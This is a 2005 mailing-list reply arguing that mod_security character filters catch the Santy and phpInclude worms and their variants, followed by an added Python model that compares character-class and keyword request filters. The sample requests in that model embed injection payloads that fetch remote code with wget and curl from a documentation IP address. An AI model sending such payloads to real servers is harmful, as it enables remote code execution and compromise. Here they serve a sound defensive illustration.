On Fri, 31 Dec 2004, Ofer Shezaf wrote:
>
> I must point you to an interesting thread in bugtraq (see excerpts
> below) - as you can see, people writing rules for mod_security
> understand that the rules are limited to a specific worm but usually
> cannot handle potential variants.
>
> "Santy" and "phpInclude" emphasize the need for real application
> security measurements such as code review, application layer scanning
> and real time application layer security. Simpler IPS system such as
> mod_security (as well as commercial products that cost a lot of money
> such as CheckPoint Web Intelligence, IntruShield or Proventia) cannot
> effectively handle such attacks.
Actually, some of the rules, like the ones I have written, look for characters
that I've found quite useful to protect against, such as:
'
%25
%2527
://
Filters such as these, which do not filter on "perl" or "wget", effectively
catch not just the Santy and phpInclude attacks, but all other kinds of
GET injections. Based on the sheer number of attacks I've logged, such
filters are effectively handling those attacks.
However, one must note that security is not about using a single source of
protection, it is the art of security layering that is prudent to apply.
mod_security is just a step in that process.
To your point, developers must pay more attention when coding to ensure
that variables and arguments are properly sanitized. For PHP sites,
mod_security has a mechanism to protect against register_globals as well.
Here are quite a few you can read on:
http://modsecurity.org/documentation/snortmodsec-rules.txt
There are other sources of security that can be applied to Apache, such as
mod_dosevasive and mod_require_host.
On the excerpts you've quoted, I can understand and appreciate the variety
of attacks that can be formed and sent. If history has taught us
anything, in the real and online worlds, anything is breachable.
However, I'm not so sure that a blanket statement that products like
those you mention above cannot handle such attacks is a fair one at
all. I suggest you read some of the articles on mod_security:
ref: http://modsecurity.org/documentation/index.html
http://www.onlamp.com/pub/a/apache/2003/11/26/mod_security.html
http://www.securityfocus.com/infocus/1739
http://modsecurity.org/documentation/apache-internal-chroot.html
http://modsecurity.org/documentation/php-register-globals.html
In your initial email you discuss real time application monitoring. I
don't see how mod_security is any different, as it inspects GETs and/or
POSTs in real time.
If Santy and phpInclude have accomplished anything positive, I hope that
it highlights (no pun intended) to coders the need to refocus on securing
their applications.
--
Regards,
Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.
Received on Jan 02 2005
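The distinction Laudanski draws above, character-class rules (`'`, `%25`, `%2527`, `://`) versus rules keyed on a worm's own payload strings ("perl", "wget"), as an added example that is not part of the original thread and is not mod_security's rule engine or the ruleset he links. It is a small Python model of both rule families run over a handful of constructed request lines (the host 198.51.100.7 is a documentation address, the rule names and the two-stage URL decoding are assumptions made for illustration). It shows the two cases the message argues: a remote-include variant that swaps `wget` for `curl` slips past the keyword rule but still trips `://`, and a plain SQL injection with a literal apostrophe is caught with no worm-specific knowledge at all. It also includes the cost side a practitioner should expect: a legitimate search for "100%" trips the `%25` rule.

```python
"""Character-class versus keyword request filters (added illustrative model)."""
import re
from urllib.parse import unquote

# Character-class filters: an assumed illustrative set built from the four
# tokens listed in the message, not the full ruleset it links to.
CHAR_FILTERS = {
    "single_quote": re.compile(r"'"),
    "encoded_percent": re.compile(r"%25", re.IGNORECASE),
    "double_encoded_quote": re.compile(r"%2527", re.IGNORECASE),
    "url_scheme": re.compile(r"://"),
}

# Keyword filters tied to one worm's download/execution method.
KEYWORD_FILTERS = {
    "perl": re.compile(r"perl", re.IGNORECASE),
    "wget": re.compile(r"wget", re.IGNORECASE),
}


def normalisation_stages(request_line, depth=2):
    """Return the raw request line followed by up to `depth` rounds of URL
    decoding, so single- and double-encoded payloads are both inspected."""
    stages = [request_line]
    for _ in range(depth):
        decoded = unquote(stages[-1])
        if decoded == stages[-1]:
            break
        stages.append(decoded)
    return stages


def apply_filters(request_line, filters):
    """Names of the filters that match at any normalisation stage."""
    hits = set()
    for stage in normalisation_stages(request_line):
        for name, pattern in filters.items():
            if pattern.search(stage):
                hits.add(name)
    return frozenset(hits)


def classify(request_line):
    """Verdict of both rule families for one request line."""
    return {
        "char": apply_filters(request_line, CHAR_FILTERS),
        "keyword": apply_filters(request_line, KEYWORD_FILTERS),
    }


# Constructed sample request lines (not captured traffic).
SAMPLES = {
    # Santy-style: double-encoded apostrophe closing a string in the
    # highlight parameter; the payload fetches a file with wget.
    "santy_like": (
        "GET /viewtopic.php?t=1&highlight=%2527%252Esystem(%2522wget%2520"
        "http%253A%252F%252F198.51.100.7%252Fbot%2522)%252E%2527 HTTP/1.0"
    ),
    # phpInclude-style remote include that fetches with curl instead of
    # wget: the keyword rule misses it, the :// rule still fires.
    "include_variant": (
        "GET /index.php?page=http://198.51.100.7/cmd.txt?c=curl+-o+/tmp/x"
        "+http://198.51.100.7/x HTTP/1.1"
    ),
    # Plain SQL injection attempt carrying a literal apostrophe.
    "sqli": "GET /news.php?id=1'+OR+'1'='1 HTTP/1.1",
    # Ordinary forum browsing.
    "benign": "GET /viewtopic.php?t=42&start=15 HTTP/1.1",
    # Legitimate search for "100%": %25 is a real percent sign, yet the
    # character rule fires, so broad rules carry a false-positive cost.
    "benign_percent": "GET /search.php?q=100%25+done HTTP/1.1",
}


def report(samples=SAMPLES):
    """Return {label: (blocked_by_char_rules, blocked_by_keyword_rules)}."""
    return {
        label: (bool(verdict["char"]), bool(verdict["keyword"]))
        for label, verdict in ((l, classify(line)) for l, line in samples.items())
    }


if __name__ == "__main__":
    for label, line in SAMPLES.items():
        verdict = classify(line)
        print(f"{label:16} char={sorted(verdict['char'])} "
              f"keyword={sorted(verdict['keyword'])}")
```

Running the block prints one line per sample; the double-encoded Santy-style request is only fully visible after two rounds of decoding, which is why the model inspects each normalisation stage rather than the raw line alone.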